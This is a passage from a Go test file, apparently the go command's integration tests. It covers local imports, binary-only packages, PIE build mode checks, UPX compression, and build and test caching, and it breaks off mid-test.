Description: The foo library
Version: 1.0.0
Cflags: -Dhello=10 -Dworld=+32 -DDEFINED_FROM_PKG_CONFIG=hello\ world
`)
tg.tempFile("foo.go", `package main
/*
#cgo pkg-config: foo
int value() {
return DEFINED_FROM_PKG_CONFIG;
}
*/
import "C"
import "os"
func main() {
if C.value() != 42 {
println("value() =", C.value(), "wanted 42")
os.Exit(1)
}
}
`)
tg.setenv("PKG_CONFIG_PATH", tg.path("."))
tg.run("run", tg.path("foo.go"))
}
func TestListTemplateContextFunction(t *testing.T) {
t.Parallel()
for _, tt := range []struct {
v string
want string
}{
{"GOARCH", runtime.GOARCH},
{"GOOS", runtime.GOOS},
{"GOROOT", filepath.Clean(runtime.GOROOT())},
{"GOPATH", os.Getenv("GOPATH")},
{"CgoEnabled", ""},
{"UseAllFiles", ""},
{"Compiler", ""},
{"BuildTags", ""},
{"ReleaseTags", ""},
{"InstallSuffix", ""},
} {
tt := tt
t.Run(tt.v, func(t *testing.T) {
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tmpl := "{{context." + tt.v + "}}"
tg.run("list", "-f", tmpl)
if tt.want == "" {
return
}
if got := strings.TrimSpace(tg.getStdout()); got != tt.want {
t.Errorf("go list -f %q: got %q; want %q", tmpl, got, tt.want)
}
})
}
}
// Test that you cannot use a local import in a package
// accessed by a non-local import (found in a GOPATH/GOROOT).
// See golang.org/issue/17475.
func TestImportLocal(t *testing.T) {
tooSlow(t)
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.tempFile("src/dir/x/x.go", `package x
var X int
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "dir/x")
// Ordinary import should work.
tg.tempFile("src/dir/p0/p.go", `package p0
import "dir/x"
var _ = x.X
`)
tg.run("build", "dir/p0")
// Relative import should not.
tg.tempFile("src/dir/p1/p.go", `package p1
import "../x"
var _ = x.X
`)
tg.runFail("build", "dir/p1")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in a test.
tg.tempFile("src/dir/p2/p.go", `package p2
`)
tg.tempFile("src/dir/p2/p_test.go", `package p2
import "../x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/p2")
tg.runFail("test", "dir/p2")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in an xtest.
tg.tempFile("src/dir/p2/p_test.go", `package p2_test
import "../x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/p2")
tg.runFail("test", "dir/p2")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// Relative import starting with ./ should not work either.
tg.tempFile("src/dir/d.go", `package dir
import "./x"
var _ = x.X
`)
tg.runFail("build", "dir")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in a test.
tg.tempFile("src/dir/d.go", `package dir
`)
tg.tempFile("src/dir/d_test.go", `package dir
import "./x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir")
tg.runFail("test", "dir")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in an xtest.
tg.tempFile("src/dir/d_test.go", `package dir_test
import "./x"
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir")
tg.runFail("test", "dir")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// Relative import plain ".." should not work.
tg.tempFile("src/dir/x/y/y.go", `package dir
import ".."
var _ = x.X
`)
tg.runFail("build", "dir/x/y")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in a test.
tg.tempFile("src/dir/x/y/y.go", `package y
`)
tg.tempFile("src/dir/x/y/y_test.go", `package y
import ".."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x/y")
tg.runFail("test", "dir/x/y")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// ... even in an x test.
tg.tempFile("src/dir/x/y/y_test.go", `package y_test
import ".."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x/y")
tg.runFail("test", "dir/x/y")
tg.grepStderr("local import.*in non-local package", "did not diagnose local import")
// Relative import "." should not work.
tg.tempFile("src/dir/x/xx.go", `package x
import "."
var _ = x.X
`)
tg.runFail("build", "dir/x")
tg.grepStderr("cannot import current directory", "did not diagnose import current directory")
// ... even in a test.
tg.tempFile("src/dir/x/xx.go", `package x
`)
tg.tempFile("src/dir/x/xx_test.go", `package x
import "."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x")
tg.runFail("test", "dir/x")
tg.grepStderr("cannot import current directory", "did not diagnose import current directory")
// ... even in an xtest.
tg.tempFile("src/dir/x/xx.go", `package x
`)
tg.tempFile("src/dir/x/xx_test.go", `package x_test
import "."
import "testing"
var _ = x.X
func TestFoo(t *testing.T) {}
`)
tg.run("build", "dir/x")
tg.runFail("test", "dir/x")
tg.grepStderr("cannot import current directory", "did not diagnose import current directory")
}
func TestGoInstallPkgdir(t *testing.T) {
skipIfGccgo(t, "gccgo has no standard packages")
tooSlow(t)
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.makeTempdir()
pkg := tg.path(".")
tg.run("install", "-pkgdir", pkg, "sync")
tg.mustExist(filepath.Join(pkg, "sync.a"))
tg.mustNotExist(filepath.Join(pkg, "sync/atomic.a"))
tg.run("install", "-i", "-pkgdir", pkg, "sync")
tg.mustExist(filepath.Join(pkg, "sync.a"))
tg.mustExist(filepath.Join(pkg, "sync/atomic.a"))
}
// For issue 14337.
func TestParallelTest(t *testing.T) {
tooSlow(t)
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.makeTempdir()
const testSrc = `package package_test
import (
"testing"
)
func TestTest(t *testing.T) {
}`
tg.tempFile("src/p1/p1_test.go", strings.Replace(testSrc, "package_test", "p1_test", 1))
tg.tempFile("src/p2/p2_test.go", strings.Replace(testSrc, "package_test", "p2_test", 1))
tg.tempFile("src/p3/p3_test.go", strings.Replace(testSrc, "package_test", "p3_test", 1))
tg.tempFile("src/p4/p4_test.go", strings.Replace(testSrc, "package_test", "p4_test", 1))
tg.setenv("GOPATH", tg.path("."))
tg.run("test", "-p=4", "p1", "p2", "p3", "p4")
}
func TestBinaryOnlyPackages(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.path("."))
tg.tempFile("src/p1/p1.go", `//go:binary-only-package
package p1
`)
tg.wantStale("p1", "binary-only packages are no longer supported", "p1 is binary-only, and this message should always be printed")
tg.runFail("install", "p1")
tg.grepStderr("binary-only packages are no longer supported", "did not report attempt to compile binary-only package")
tg.tempFile("src/p1/p1.go", `
package p1
import "fmt"
func F(b bool) { fmt.Printf("hello from p1\n"); if b { F(false) } }
`)
tg.run("install", "p1")
os.Remove(tg.path("src/p1/p1.go"))
tg.mustNotExist(tg.path("src/p1/p1.go"))
tg.tempFile("src/p2/p2.go", `//go:binary-only-packages-are-not-great
package p2
import "p1"
func F() { p1.F(true) }
`)
tg.runFail("install", "p2")
tg.grepStderr("no Go files", "did not complain about missing sources")
tg.tempFile("src/p1/missing.go", `//go:binary-only-package
package p1
import _ "fmt"
func G()
`)
tg.wantStale("p1", "binary-only package", "should NOT want to rebuild p1 (first)")
tg.runFail("install", "p2")
tg.grepStderr("p1: binary-only packages are no longer supported", "did not report error for binary-only p1")
tg.run("list", "-deps", "-f", "{{.ImportPath}}: {{.BinaryOnly}}", "p2")
tg.grepStdout("p1: true", "p1 not listed as BinaryOnly")
tg.grepStdout("p2: false", "p2 listed as BinaryOnly")
}
// Issue 16050.
func TestAlwaysLinkSysoFiles(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src/syso")
tg.tempFile("src/syso/a.syso", ``)
tg.tempFile("src/syso/b.go", `package syso`)
tg.setenv("GOPATH", tg.path("."))
// We should see the .syso file regardless of the setting of
// CGO_ENABLED.
tg.setenv("CGO_ENABLED", "1")
tg.run("list", "-f", "{{.SysoFiles}}", "syso")
tg.grepStdout("a.syso", "missing syso file with CGO_ENABLED=1")
tg.setenv("CGO_ENABLED", "0")
tg.run("list", "-f", "{{.SysoFiles}}", "syso")
tg.grepStdout("a.syso", "missing syso file with CGO_ENABLED=0")
}
// Issue 16120.
func TestGenerateUsesBuildContext(t *testing.T) {
if runtime.GOOS == "windows" {
t.Skip("this test won't run under Windows")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempDir("src/gen")
tg.tempFile("src/gen/gen.go", "package gen\n//go:generate echo $GOOS $GOARCH\n")
tg.setenv("GOPATH", tg.path("."))
tg.setenv("GOOS", "linux")
tg.setenv("GOARCH", "amd64")
tg.run("generate", "gen")
tg.grepStdout("linux amd64", "unexpected GOOS/GOARCH combination")
tg.setenv("GOOS", "darwin")
tg.setenv("GOARCH", "arm64")
tg.run("generate", "gen")
tg.grepStdout("darwin arm64", "unexpected GOOS/GOARCH combination")
}
func TestGoEnv(t *testing.T) {
tg := testgo(t)
tg.parallel()
defer tg.cleanup()
tg.setenv("GOOS", "freebsd") // to avoid invalid pair errors
tg.setenv("GOARCH", "arm")
tg.run("env", "GOARCH")
tg.grepStdout("^arm$", "GOARCH not honored")
tg.run("env", "GCCGO")
tg.grepStdout(".", "GCCGO unexpectedly empty")
tg.run("env", "CGO_CFLAGS")
tg.grepStdout(".", "default CGO_CFLAGS unexpectedly empty")
tg.setenv("CGO_CFLAGS", "-foobar")
tg.run("env", "CGO_CFLAGS")
tg.grepStdout("^-foobar$", "CGO_CFLAGS not honored")
tg.setenv("CC", "gcc -fmust -fgo -ffaster")
tg.run("env", "CC")
tg.grepStdout("gcc", "CC not found")
tg.run("env", "GOGCCFLAGS")
tg.grepStdout("-ffaster", "CC arguments not found")
tg.run("env", "GOVERSION")
envVersion := strings.TrimSpace(tg.stdout.String())
tg.run("version")
cmdVersion := strings.TrimSpace(tg.stdout.String())
// If 'go version' is "go version <version> <goos>/<goarch>", then
// 'go env GOVERSION' is just "<version>".
if cmdVersion == envVersion || !strings.Contains(cmdVersion, envVersion) {
t.Fatalf("'go env GOVERSION' %q should be a shorter substring of 'go version' %q", envVersion, cmdVersion)
}
}
const (
noMatchesPattern = `(?m)^ok.*\[no tests to run\]`
okPattern = `(?m)^ok`
)
// Issue 18044.
func TestLdBindNow(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("LD_BIND_NOW", "1")
tg.run("help")
}
// Issue 18225.
// This is really a cmd/asm issue but this is a convenient place to test it.
func TestConcurrentAsm(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/asm")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
asm := `DATA ·constants<>+0x0(SB)/8,$0
GLOBL ·constants<>(SB),8,$8
`
tg.tempFile("go/src/p/a.s", asm)
tg.tempFile("go/src/p/b.s", asm)
tg.tempFile("go/src/p/p.go", `package p`)
tg.setenv("GOPATH", tg.path("go"))
tg.run("build", "p")
}
// Issue 18975.
func TestFFLAGS(t *testing.T) {
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("p/src/p/main.go", `package main
// #cgo FFLAGS: -no-such-fortran-flag
import "C"
func main() {}
`)
tg.tempFile("p/src/p/a.f", `! comment`)
tg.setenv("GOPATH", tg.path("p"))
// This should normally fail because we are passing an unknown flag,
// but issue #19080 points to Fortran compilers that succeed anyhow.
// To work either way we call doRun directly rather than run or runFail.
tg.doRun([]string{"build", "-x", "p"})
tg.grepStderr("no-such-fortran-flag", `missing expected "-no-such-fortran-flag"`)
}
// Issue 19198.
// This is really a cmd/link issue but this is a convenient place to test it.
func TestDuplicateGlobalAsmSymbols(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/asm")
tooSlow(t)
if runtime.GOARCH != "386" && runtime.GOARCH != "amd64" {
t.Skipf("skipping test on %s", runtime.GOARCH)
}
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
asm := `
#include "textflag.h"
DATA sym<>+0x0(SB)/8,$0
GLOBL sym<>(SB),(NOPTR+RODATA),$8
TEXT ·Data(SB),NOSPLIT,$0
MOVB sym<>(SB), AX
MOVB AX, ret+0(FP)
RET
`
tg.tempFile("go/src/a/a.s", asm)
tg.tempFile("go/src/a/a.go", `package a; func Data() uint8`)
tg.tempFile("go/src/b/b.s", asm)
tg.tempFile("go/src/b/b.go", `package b; func Data() uint8`)
tg.tempFile("go/src/p/p.go", `
package main
import "a"
import "b"
import "C"
func main() {
_ = a.Data() + b.Data()
}
`)
tg.setenv("GOPATH", tg.path("go"))
exe := tg.path("p.exe")
tg.creatingTemp(exe)
tg.run("build", "-o", exe, "p")
}
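// copyFile copies the contents of src to dst, creating dst with the given
// permissions, and reports the first error encountered.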
func copyFile(src, dst string, perm fs.FileMode) error {
sf, err := os.Open(src)
if err != nil {
return err
}
defer sf.Close()
df, err := os.OpenFile(dst, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
if err != nil {
return err
}
_, err = io.Copy(df, sf)
err2 := df.Close()
if err != nil {
return err
}
return err2
}
func TestNeedVersion(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/compile")
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("goversion.go", `package main; func main() {}`)
path := tg.path("goversion.go")
tg.setenv("TESTGO_VERSION", "go1.testgo")
tg.runFail("run", path)
tg.grepStderr("compile", "does not match go tool version")
}
func TestBuildmodePIE(t *testing.T) {
if testing.Short() && testenv.Builder() == "" {
t.Skipf("skipping in -short mode on non-builder")
}
platform := fmt.Sprintf("%s/%s", runtime.GOOS, runtime.GOARCH)
switch platform {
case "linux/386", "linux/amd64", "linux/arm", "linux/arm64", "linux/ppc64le", "linux/riscv64", "linux/s390x",
"android/amd64", "android/arm", "android/arm64", "android/386",
"freebsd/amd64",
"windows/386", "windows/amd64", "windows/arm":
case "darwin/amd64":
default:
t.Skipf("skipping test because buildmode=pie is not supported on %s", platform)
}
t.Run("non-cgo", func(t *testing.T) {
testBuildmodePIE(t, false, true)
})
if canCgo {
switch runtime.GOOS {
case "darwin", "freebsd", "linux", "windows":
t.Run("cgo", func(t *testing.T) {
testBuildmodePIE(t, true, true)
})
}
}
}
func TestWindowsDefaultBuildmodeIsPIE(t *testing.T) {
if testing.Short() && testenv.Builder() == "" {
t.Skipf("skipping in -short mode on non-builder")
}
if runtime.GOOS != "windows" {
t.Skip("skipping windows only test")
}
t.Run("non-cgo", func(t *testing.T) {
testBuildmodePIE(t, false, false)
})
if canCgo {
t.Run("cgo", func(t *testing.T) {
testBuildmodePIE(t, true, false)
})
}
}
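// testBuildmodePIE builds a trivial program (optionally importing "C" and
// optionally passing -buildmode=pie explicitly) and then inspects the
// resulting binary to verify that it is position-independent for the host
// object format, finally running it to check its output.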
func testBuildmodePIE(t *testing.T, useCgo, setBuildmodeToPIE bool) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
var s string
if useCgo {
s = `import "C";`
}
tg.tempFile("main.go", fmt.Sprintf(`package main;%s func main() { print("hello") }`, s))
src := tg.path("main.go")
obj := tg.path("main.exe")
args := []string{"build"}
if setBuildmodeToPIE {
args = append(args, "-buildmode=pie")
}
args = append(args, "-o", obj, src)
tg.run(args...)
switch runtime.GOOS {
case "linux", "android", "freebsd":
f, err := elf.Open(obj)
if err != nil {
t.Fatal(err)
}
defer f.Close()
if f.Type != elf.ET_DYN {
t.Errorf("PIE type must be ET_DYN, but %s", f.Type)
}
case "darwin":
f, err := macho.Open(obj)
if err != nil {
t.Fatal(err)
}
defer f.Close()
if f.Flags&macho.FlagDyldLink == 0 {
t.Error("PIE must have DyldLink flag, but not")
}
if f.Flags&macho.FlagPIE == 0 {
t.Error("PIE must have PIE flag, but not")
}
case "windows":
f, err := pe.Open(obj)
if err != nil {
t.Fatal(err)
}
defer f.Close()
if f.Section(".reloc") == nil {
t.Error(".reloc section is not present")
}
if (f.FileHeader.Characteristics & pe.IMAGE_FILE_RELOCS_STRIPPED) != 0 {
t.Error("IMAGE_FILE_RELOCS_STRIPPED flag is set")
}
var dc uint16
switch oh := f.OptionalHeader.(type) {
case *pe.OptionalHeader32:
dc = oh.DllCharacteristics
case *pe.OptionalHeader64:
dc = oh.DllCharacteristics
if (dc & pe.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA) == 0 {
t.Error("IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA flag is not set")
}
default:
t.Fatalf("unexpected optional header type of %T", f.OptionalHeader)
}
if (dc & pe.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) == 0 {
t.Error("IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag is not set")
}
if useCgo {
// Test that only one symbol is exported (#40795).
// PIE binaries don't require an .edata section, but unfortunately
// binutils doesn't generate a .reloc section unless there is
// at least one symbol exported.
// See https://sourceware.org/bugzilla/show_bug.cgi?id=19011
section := f.Section(".edata")
if section == nil {
t.Skip(".edata section is not present")
}
// TODO: deduplicate this struct from cmd/link/internal/ld/pe.go
type IMAGE_EXPORT_DIRECTORY struct {
_ [2]uint32
_ [2]uint16
_ [2]uint32
NumberOfFunctions uint32
NumberOfNames uint32
_ [3]uint32
}
var e IMAGE_EXPORT_DIRECTORY
if err := binary.Read(section.Open(), binary.LittleEndian, &e); err != nil {
t.Fatalf("binary.Read failed: %v", err)
}
// Only _cgo_dummy_export should be exported
if e.NumberOfFunctions != 1 {
t.Fatalf("got %d exported functions; want 1", e.NumberOfFunctions)
}
if e.NumberOfNames != 1 {
t.Fatalf("got %d exported names; want 1", e.NumberOfNames)
}
}
default:
panic("unreachable")
}
out, err := exec.Command(obj).CombinedOutput()
if err != nil {
t.Fatal(err)
}
if string(out) != "hello" {
t.Errorf("got %q; want %q", out, "hello")
}
}
func TestUpxCompression(t *testing.T) {
if runtime.GOOS != "linux" ||
(runtime.GOARCH != "amd64" && runtime.GOARCH != "386") {
t.Skipf("skipping upx test on %s/%s", runtime.GOOS, runtime.GOARCH)
}
testenv.MustHaveExecPath(t, "upx")
out, err := exec.Command("upx", "--version").CombinedOutput()
if err != nil {
t.Fatalf("upx --version failed: %v", err)
}
// upx --version prints `upx <version>` in the first line of output:
// upx 3.94
// [...]
re := regexp.MustCompile(`([[:digit:]]+)\.([[:digit:]]+)`)
upxVersion := re.FindStringSubmatch(string(out))
if len(upxVersion) != 3 {
t.Fatalf("bad upx version string: %s", upxVersion)
}
major, err1 := strconv.Atoi(upxVersion[1])
minor, err2 := strconv.Atoi(upxVersion[2])
if err1 != nil || err2 != nil {
t.Fatalf("bad upx version string: %s", upxVersion[0])
}
// Anything below 3.94 is known not to work with go binaries
if (major < 3) || (major == 3 && minor < 94) {
t.Skipf("skipping because upx version %v.%v is too old", major, minor)
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("main.go", `package main; import "fmt"; func main() { fmt.Print("hello upx") }`)
src := tg.path("main.go")
obj := tg.path("main")
tg.run("build", "-o", obj, src)
out, err = exec.Command("upx", obj).CombinedOutput()
if err != nil {
t.Logf("executing upx\n%s\n", out)
t.Fatalf("upx failed with %v", err)
}
out, err = exec.Command(obj).CombinedOutput()
if err != nil {
t.Logf("%s", out)
t.Fatalf("running compressed go binary failed with error %s", err)
}
if string(out) != "hello upx" {
t.Fatalf("bad output from compressed go binary:\ngot %q; want %q", out, "hello upx")
}
}
func TestCacheListStale(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.path("cache"))
tg.tempFile("gopath/src/p/p.go", "package p; import _ \"q\"; func F(){}\n")
tg.tempFile("gopath/src/q/q.go", "package q; func F(){}\n")
tg.tempFile("gopath/src/m/m.go", "package main; import _ \"q\"; func main(){}\n")
tg.setenv("GOPATH", tg.path("gopath"))
tg.run("install", "p", "m")
tg.run("list", "-f={{.ImportPath}} {{.Stale}}", "m", "q", "p")
tg.grepStdout("^m false", "m should not be stale")
tg.grepStdout("^q true", "q should be stale")
tg.grepStdout("^p false", "p should not be stale")
}
func TestCacheCoverage(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.setenv("GOPATH", filepath.Join(tg.pwd(), "testdata"))
tg.makeTempdir()
tg.setenv("GOCACHE", tg.path("c1"))
tg.run("test", "-cover", "-short", "strings")
tg.run("test", "-cover", "-short", "math", "strings")
}
func TestIssue22588(t *testing.T) {
// Don't get confused by stderr coming from tools.
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
if _, err := os.Stat("/usr/bin/time"); err != nil {
t.Skip(err)
}
tg.run("list", "-f={{.Stale}}", "runtime")
tg.run("list", "-toolexec=/usr/bin/time", "-f={{.Stale}}", "runtime")
tg.grepStdout("false", "incorrectly reported runtime as stale")
}
func TestIssue22531(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.tempdir)
tg.setenv("GOCACHE", tg.path("cache"))
tg.tempFile("src/m/main.go", "package main /* c1 */; func main() {}\n")
tg.run("install", "-x", "m")
tg.run("list", "-f", "{{.Stale}}", "m")
tg.grepStdout("false", "reported m as stale after install")
tg.run("tool", "buildid", tg.path("bin/m"+exeSuffix))
// The link action ID did not include the full main build ID,
// even though the full main build ID is written into the
// eventual binary. That caused the following install to
// be a no-op, thinking the gofmt binary was up-to-date,
// even though .Stale could see it was not.
tg.tempFile("src/m/main.go", "package main /* c2 */; func main() {}\n")
tg.run("install", "-x", "m")
tg.run("list", "-f", "{{.Stale}}", "m")
tg.grepStdout("false", "reported m as stale after reinstall")
tg.run("tool", "buildid", tg.path("bin/m"+exeSuffix))
}
func TestIssue22596(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOCACHE", tg.path("cache"))
tg.tempFile("gopath1/src/p/p.go", "package p; func F(){}\n")
tg.tempFile("gopath2/src/p/p.go", "package p; func F(){}\n")
tg.setenv("GOPATH", tg.path("gopath1"))
tg.run("list", "-f={{.Target}}", "p")
target1 := strings.TrimSpace(tg.getStdout())
tg.run("install", "p")
tg.wantNotStale("p", "", "p stale after install")
tg.setenv("GOPATH", tg.path("gopath2"))
tg.run("list", "-f={{.Target}}", "p")
target2 := strings.TrimSpace(tg.getStdout())
tg.must(os.MkdirAll(filepath.Dir(target2), 0777))
tg.must(copyFile(target1, target2, 0666))
tg.wantStale("p", "build ID mismatch", "p not stale after copy from gopath1")
tg.run("install", "p")
tg.wantNotStale("p", "", "p stale after install2")
}
func TestTestCache(t *testing.T) {
tooSlow(t)
if strings.Contains(os.Getenv("GODEBUG"), "gocacheverify") {
t.Skip("GODEBUG gocacheverify")
}
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.tempdir)
tg.setenv("GOCACHE", tg.path("cache"))
// The -p=1 in the commands below just makes the -x output easier to read.
t.Log("\n\nINITIAL\n\n")
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 1\n")
tg.tempFile("src/p2/p2.go", "package p2\nimport _ \"p1\"\nvar X = 1\n")
tg.tempFile("src/t/t1/t1_test.go", "package t\nimport \"testing\"\nfunc Test1(*testing.T) {}\n")
tg.tempFile("src/t/t2/t2_test.go", "package t\nimport _ \"p1\"\nimport \"testing\"\nfunc Test2(*testing.T) {}\n")
tg.tempFile("src/t/t3/t3_test.go", "package t\nimport \"p1\"\nimport \"testing\"\nfunc Test3(t *testing.T) {t.Log(p1.X)}\n")
tg.tempFile("src/t/t4/t4_test.go", "package t\nimport \"p2\"\nimport \"testing\"\nfunc Test4(t *testing.T) {t.Log(p2.X)}")
tg.run("test", "-x", "-v", "-short", "t/...")
t.Log("\n\nREPEAT\n\n")
tg.run("test", "-x", "-v", "-short", "t/...")
tg.grepStdout(`ok \tt/t1\t\(cached\)`, "did not cache t1")
tg.grepStdout(`ok \tt/t2\t\(cached\)`, "did not cache t2")
tg.grepStdout(`ok \tt/t3\t\(cached\)`, "did not cache t3")
tg.grepStdout(`ok \tt/t4\t\(cached\)`, "did not cache t4")
tg.grepStderrNot(`[\\/](compile|gccgo) `, "incorrectly ran compiler")
tg.grepStderrNot(`[\\/](link|gccgo) `, "incorrectly ran linker")
tg.grepStderrNot(`p[0-9]\.test`, "incorrectly ran test")
t.Log("\n\nCOMMENT\n\n")
// Changing the program text without affecting the compiled package
// should result in the package being rebuilt but nothing more.
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 01\n")
tg.run("test", "-p=1", "-x", "-v", "-short", "t/...")
tg.grepStdout(`ok \tt/t1\t\(cached\)`, "did not cache t1")
tg.grepStdout(`ok \tt/t2\t\(cached\)`, "did not cache t2")
tg.grepStdout(`ok \tt/t3\t\(cached\)`, "did not cache t3")
tg.grepStdout(`ok \tt/t4\t\(cached\)`, "did not cache t4")
tg.grepStderrNot(`([\\/](compile|gccgo) ).*t[0-9]_test\.go`, "incorrectly ran compiler")
tg.grepStderrNot(`[\\/](link|gccgo) `, "incorrectly ran linker")
tg.grepStderrNot(`t[0-9]\.test.*test\.short`, "incorrectly ran test")
t.Log("\n\nCHANGE\n\n")
// Changing the actual package should have limited effects.
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 02\n")
tg.run("test", "-p=1", "-x", "-v", "-short", "t/...")
// p2 should have been rebuilt.
tg.grepStderr(`([\\/]compile|gccgo).*p2.go`, "did not recompile p2")
// t1 does not import anything, should not have been rebuilt.
tg.grepStderrNot(`([\\/]compile|gccgo).*t1_test.go`, "incorrectly recompiled t1")
tg.grepStderrNot(`([\\/]link|gccgo).*t1_test`, "incorrectly relinked t1_test")
tg.grepStdout(`ok \tt/t1\t\(cached\)`, "did not cache t/t1")
// t2 imports p1 and must be rebuilt and relinked,
// but the change should not have any effect on the test binary,
// so the test should not have been rerun.
tg.grepStderr(`([\\/]compile|gccgo).*t2_test.go`, "did not recompile t2")
tg.grepStderr(`([\\/]link|gccgo).*t2\.test`, "did not relink t2_test")
// This check does not currently work with gccgo, as garbage
// collection of unused variables is not turned on by default.
if runtime.Compiler != "gccgo" {
tg.grepStdout(`ok \tt/t2\t\(cached\)`, "did not cache t/t2")
}
// t3 imports p1, and changing X changes t3's test binary.
tg.grepStderr(`([\\/]compile|gccgo).*t3_test.go`, "did not recompile t3")
tg.grepStderr(`([\\/]link|gccgo).*t3\.test`, "did not relink t3_test")
tg.grepStderr(`t3\.test.*-test.short`, "did not rerun t3_test")
tg.grepStdoutNot(`ok \tt/t3\t\(cached\)`, "reported cached t3_test result")
// t4 imports p2, but p2 did not change, so t4 should be relinked, not recompiled,
// and not rerun.
tg.grepStderrNot(`([\\/]compile|gccgo).*t4_test.go`, "incorrectly recompiled t4")
tg.grepStderr(`([\\/]link|gccgo).*t4\.test`, "did not relink t4_test")
// This check does not currently work with gccgo, as garbage
// collection of unused variables is not turned on by default.
if runtime.Compiler != "gccgo" {
tg.grepStdout(`ok \tt/t4\t\(cached\)`, "did not cache t/t4")
}
}
func TestTestSkipVetAfterFailedBuild(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("x_test.go", `package x
func f() {
return 1
}
`)
tg.runFail("test", tg.path("x_test.go"))
tg.grepStderrNot(`vet`, "vet should be skipped after the failed build")
}
func TestTestVetRebuild(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
// golang.org/issue/23701.
// b_test imports b with augmented method from export_test.go.
// b_test also imports a, which imports b.
// Must not accidentally see un-augmented b propagate through a to b_test.
tg.tempFile("src/a/a.go", `package a
import "b"
type Type struct{}
func (*Type) M() b.T {return 0}
`)
tg.tempFile("src/b/b.go", `package b
type T int
type I interface {M() T}
`)
tg.tempFile("src/b/export_test.go", `package b
func (*T) Method() *T { return nil }
`)
tg.tempFile("src/b/b_test.go", `package b_test
import (
"testing"
"a"
. "b"
)
func TestBroken(t *testing.T) {
x := new(T)
x.Method()
_ = new(a.Type)
}
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("test", "b")
tg.run("vet", "b")
}
func TestInstallDeps(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.makeTempdir()
tg.setenv("GOPATH", tg.tempdir)
tg.tempFile("src/p1/p1.go", "package p1\nvar X = 1\n")
tg.tempFile("src/p2/p2.go", "package p2\nimport _ \"p1\"\n")
tg.tempFile("src/main1/main.go", "package main\nimport _ \"p2\"\nfunc main() {}\n")
tg.run("list", "-f={{.Target}}", "p1")
p1 := strings.TrimSpace(tg.getStdout())
tg.run("list", "-f={{.Target}}", "p2")
p2 := strings.TrimSpace(tg.getStdout())
tg.run("list", "-f={{.Target}}", "main1")
main1 := strings.TrimSpace(tg.getStdout())
tg.run("install", "main1")
tg.mustExist(main1)
tg.mustNotExist(p2)
tg.mustNotExist(p1)
tg.run("install", "p2")
tg.mustExist(p2)
tg.mustNotExist(p1)
